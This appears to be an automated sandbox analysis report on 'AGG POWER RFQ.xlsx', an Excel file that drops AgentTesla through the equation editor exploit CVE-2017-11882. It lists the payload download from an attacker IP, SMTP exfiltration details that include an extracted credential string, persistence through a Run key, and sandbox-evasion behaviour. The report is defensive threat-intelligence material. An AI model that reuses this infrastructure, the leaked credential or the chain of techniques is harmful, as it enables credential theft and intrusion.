Windows Analysis Report AGG POWER RFQ.xlsx

Overview

General Information

Sample Name: AGG POWER RFQ.xlsx
Analysis ID: 435321
MD5: b6d32254c5e3faa7fb26cccabddad2f4
SHA1: abf474e378247ebeb3300de929a50d0996286c01
SHA256: fca7f5cda93c9f473a6c3e9c3857d19d69c25835fd71b21d8b1354f78b102397
Tags: VelvetSweatshop, xlsx
Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains very large array initializations
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Office equation editor drops PE file
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Execution from Suspicious Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

AV Detection:

Found malware configuration
Source: 00000007.00000002.2243225346.0000000002351000.00000004.00000001.sdmp Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "sales5@alkhaleejautoparts.com]~%l3$ck*(U_mail.alkhaleejautoparts.comlisafury29@safina.cc"}
Multi AV Scanner detection for submitted file
Source: AGG POWER RFQ.xlsx Virustotal: Detection: 27%
Source: AGG POWER RFQ.xlsx ReversingLabs: Detection: 21%

Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: UInt32TypeInfo.pdb source: tnvLnx.exe, tnvLnx.exe, 00000008.00000000.2234165130.0000000000212000.00000020.00020000.sdmp

Software Vulnerabilities:

Allocates a big amount of memory (probably used for heap spraying)
Source: excel.exe Memory has grown: Private usage: 4MB later: 60MB
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: mail.alkhaleejautoparts.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 192.3.141.146:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 192.3.141.146:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49166 -> 148.66.138.106:587
Source: Traffic Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49167 -> 148.66.138.106:587
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 148.66.138.106:587
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 16 Jun 2021 10:20:52 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Wed, 16 Jun 2021 05:38:46 GMTETag: "111a00-5c4db81175295"Accept-Ranges: bytesContent-Length: 1120768Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownload
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 148.66.138.106
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AS-26496-GO-DADDY-COM-LLCUS
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS
Uses SMTP (mail sending)
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 148.66.138.106:587
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /win/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.141.146Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.146
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F7AB3B46.emf
Source: global traffic HTTP traffic detected: GET /win/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.141.146Connection: Keep-Alive
Source: unknown DNS traffic detected: queries for: mail.alkhaleejautoparts.com
Source: vbc.exe, 00000005.00000002.2366999584.0000000002741000.00000004.00000001.sdmp, tnvLnx.exe, 00000007.00000002.2243225346.0000000002351000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: tnvLnx.exe, 00000007.00000002.2243225346.0000000002351000.00000004.00000001.sdmp String found in binary or memory: http://DTHLcG.com
Source: tnvLnx.exe, 00000007.00000002.2243225346.0000000002351000.00000004.00000001.sdmp String found in binary or memory: http://DynDns.comDynDNS
Source: vbc.exe, 00000005.00000002.2367132534.0000000002821000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2367250713.0000000002894000.00000004.00000001.sdmp String found in binary or memory: http://gN3yhO7qZ2vk1Dl2x8.com
Source: vbc.exe, 00000005.00000002.2367334115.00000000028BB000.00000004.00000001.sdmp String found in binary or memory: http://mail.alkhaleejautoparts.com
Source: vbc.exe, 00000005.00000002.2371482883.00000000060C0000.00000002.00000001.sdmp, tnvLnx.exe, 00000007.00000002.2244518505.0000000005B50000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000004.00000002.2155151223.0000000002401000.00000004.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2221949010.0000000002401000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: vbc.exe, 00000005.00000002.2371482883.00000000060C0000.00000002.00000001.sdmp, tnvLnx.exe, 00000007.00000002.2244518505.0000000005B50000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: vbc.exe, 00000005.00000002.2367072067.00000000027C8000.00000004.00000001.sdmp String found in binary or memory: https://api.ipify.org%
Source: tnvLnx.exe, 00000007.00000002.2243225346.0000000002351000.00000004.00000001.sdmp String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: tnvLnx.exe String found in binary or memory: https://github.com/georgw777/
Source: tnvLnx.exe String found in binary or memory: https://github.com/georgw777/MediaManager
Source: vbc.exe, 00000004.00000000.2148405134.0000000000AD2000.00000020.00020000.sdmp, vbc.exe, 00000005.00000002.2366734790.0000000000AD2000.00000020.00020000.sdmp, tnvLnx.exe, 00000006.00000002.2221233725.0000000000212000.00000020.00020000.sdmp, tnvLnx.exe, 00000007.00000000.2220311506.0000000000212000.00000020.00020000.sdmp, tnvLnx.exe, 00000008.00000000.2234165130.0000000000212000.00000020.00020000.sdmp String found in binary or memory: https://github.com/georgw777/MediaManager;https://github.com/georgw777/
Source: vbc.exe, 00000004.00000002.2155176869.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2221988672.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
Source: vbc.exe, 00000004.00000002.2155416176.0000000003409000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2366050589.0000000000402000.00000040.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2222286152.0000000003409000.00000004.00000001.sdmp, tnvLnx.exe, 00000007.00000002.2242803026.0000000000402000.00000040.00000001.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: vbc.exe, 00000005.00000002.2366999584.0000000002741000.00000004.00000001.sdmp, tnvLnx.exe, 00000007.00000002.2243225346.0000000002351000.00000004.00000001.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable Editing from the 15 h . ' yellow bar above ,, This document is a ' 3. Once you have enab
.NET source code contains very large array initializations
Source: 5.2.vbc.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b6F25B528u002d9522u002d4753u002dAD5Du002d2EB6462D9D13u007d/D22EEAA0u002d99FFu002d4867u002dB695u002dA5CAAFF01E6A.cs Large array initialization: .cctor: array initializer size 11963
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe Memory allocated: 76D20000 page execute and read and write
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: AGG POWER RFQ.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
PE file contains strange resources
Source: vbc[1].exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: tnvLnx.exe.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc[1].exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: tnvLnx.exe.5.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vbc[1].exe.2.dr, MediaManager/DebuggableAttribute.cs Cryptographic APIs: 'TransformFinalBlock'
Source: vbc[1].exe.2.dr, MediaManager/DebuggableAttribute.cs Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.vbc.exe.ad0000.2.unpack, MediaManager/DebuggableAttribute.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.vbc.exe.ad0000.2.unpack, MediaManager/DebuggableAttribute.cs Cryptographic APIs: 'CreateDecryptor'
Source: 4.0.vbc.exe.ad0000.0.unpack, MediaManager/DebuggableAttribute.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 4.0.vbc.exe.ad0000.0.unpack, MediaManager/DebuggableAttribute.cs Cryptographic APIs: 'CreateDecryptor'
Source: tnvLnx.exe.5.dr, MediaManager/DebuggableAttribute.cs Cryptographic APIs: 'TransformFinalBlock'
Source: tnvLnx.exe.5.dr, MediaManager/DebuggableAttribute.cs Cryptographic APIs: 'CreateDecryptor'
Source: 5.2.vbc.exe.400000.0.unpack, A/b2.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winXLSX@12/22@7/2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$AGG POWER RFQ.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRE7AF.tmp
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\Public\vbc.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: vbc.exe, 00000004.00000002.2155176869.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2221988672.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: vbc.exe, 00000004.00000002.2155176869.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2221988672.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: vbc.exe, 00000004.00000002.2155176869.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2221988672.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
Source: vbc.exe, 00000004.00000002.2155176869.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2221988672.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
Source: vbc.exe, 00000004.00000002.2155176869.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2221988672.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: vbc.exe, 00000004.00000002.2155176869.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2221988672.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: vbc.exe, 00000004.00000002.2155176869.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2221988672.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: vbc.exe, 00000004.00000002.2155176869.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2221988672.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
Source: vbc.exe, 00000004.00000002.2155176869.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2221988672.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
Source: AGG POWER RFQ.xlsx Virustotal: Detection: 27%
Source: AGG POWER RFQ.xlsx ReversingLabs: Detection: 21%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe 'C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe'
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe Process created: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: AGG POWER RFQ.xlsx Static file information: File size 1376256 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: UInt32TypeInfo.pdb source: tnvLnx.exe, tnvLnx.exe, 00000008.00000000.2234165130.0000000000212000.00000020.00020000.sdmp
Source: AGG POWER RFQ.xlsx Initial sample: OLE indicators vbamacros = False
Source: AGG POWER RFQ.xlsx Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 4_2_00AD3BCE push es; ret 4_2_00AD3BDC
Source: C:\Users\Public\vbc.exe Code function: 4_2_002B1122 push ecx; iretd 4_2_002B1123
Source: C:\Users\Public\vbc.exe Code function: 4_2_002B117B push edx; iretd 4_2_002B117C
Source: C:\Users\Public\vbc.exe Code function: 4_2_002B1144 push ecx; iretd 4_2_002B1145
Source: C:\Users\Public\vbc.exe Code function: 4_2_02003232 push esp; retf 4_2_02003233
Source: C:\Users\Public\vbc.exe Code function: 5_2_00AD3BCE push es; ret 5_2_00AD3BDC
Source: C:\Users\Public\vbc.exe Code function: 5_2_00223868 pushfd ; iretd 5_2_0022386D
Source: C:\Users\Public\vbc.exe Code function: 5_2_0022131F pushfd ; iretd 5_2_002213D9
Source: C:\Users\Public\vbc.exe Code function: 5_2_00221390 pushfd ; iretd 5_2_002213D9
Source: C:\Users\Public\vbc.exe Code function: 5_2_007C58AB pushad ; retf 5_2_007C58C1
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe Code function: 6_2_00213BCE push es; ret 6_2_00213BDC
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe Code function: 6_2_00713232 push esp; retf 6_2_00713233
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe Code function: 7_2_00213BCE push es; ret 7_2_00213BDC
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe Code function: 7_2_0044131F pushfd ; iretd 7_2_004413D9
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe Code function: 7_2_00441390 pushfd ; iretd 7_2_004413D9
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe Code function: 8_2_00371122 push ecx; ret 8_2_00371123
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe Code function: 8_2_00371144 push ecx; ret 8_2_00371145
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe Code function: 8_2_00713232 push esp; retf 8_2_00713233
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe Code function: 9_2_002013D0 pushfd ; iretd 9_2_002013D9
Source: initial sample Static PE information: section name: .text entropy: 7.65432769583

Persistence and Installation Behavior:

Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run tnvLnx

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe:Zone.Identifier read attributes | delete
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe Process information set: NOOPENFILEERRORBOX
Source: AGG POWER RFQ.xlsx Stream path 'EncryptedPackage' entropy: 7.99985102724 (max. 8.0)

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2221988672.0000000002426000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2155176869.0000000002426000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: tnvLnx.exe PID: 1664, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2908, type: MEMORY
Source: Yara match File source: Process Memory Space: tnvLnx.exe PID: 764, type: MEMORY
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: vbc.exe, 00000004.00000002.2155176869.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2221988672.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: vbc.exe, 00000004.00000002.2155176869.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2221988672.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Contains long sleeps (>= 3 min)
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\Public\vbc.exe Window / User API: threadDelayed 9674
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe Window / User API: threadDelayed 2968
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe Window / User API: threadDelayed 9715
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2704 Thread sleep time: -300000s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 2864 Thread sleep time: -104524s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 2968 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 3016 Thread sleep time: -360000s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 2312 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 2312 Thread sleep time: -120000s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 2292 Thread sleep count: 9674 > 30
Source: C:\Users\Public\vbc.exe TID: 856 Thread sleep count: 65 > 30
Source: C:\Users\Public\vbc.exe TID: 2312 Thread sleep count: 93 > 30
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 2628 Thread sleep time: -103694s >= -30000s
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 2612 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 2432 Thread sleep time: -300000s >= -30000s
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 2724 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 2724 Thread sleep time: -90000s >= -30000s
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 2676 Thread sleep count: 2968 > 30
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 2676 Thread sleep count: 198 > 30
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 2112 Thread sleep time: -104455s >= -30000s
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 2664 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 2548 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 2656 Thread sleep time: -300000s >= -30000s
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 3020 Thread sleep time: -5534023222112862s >= -30000s
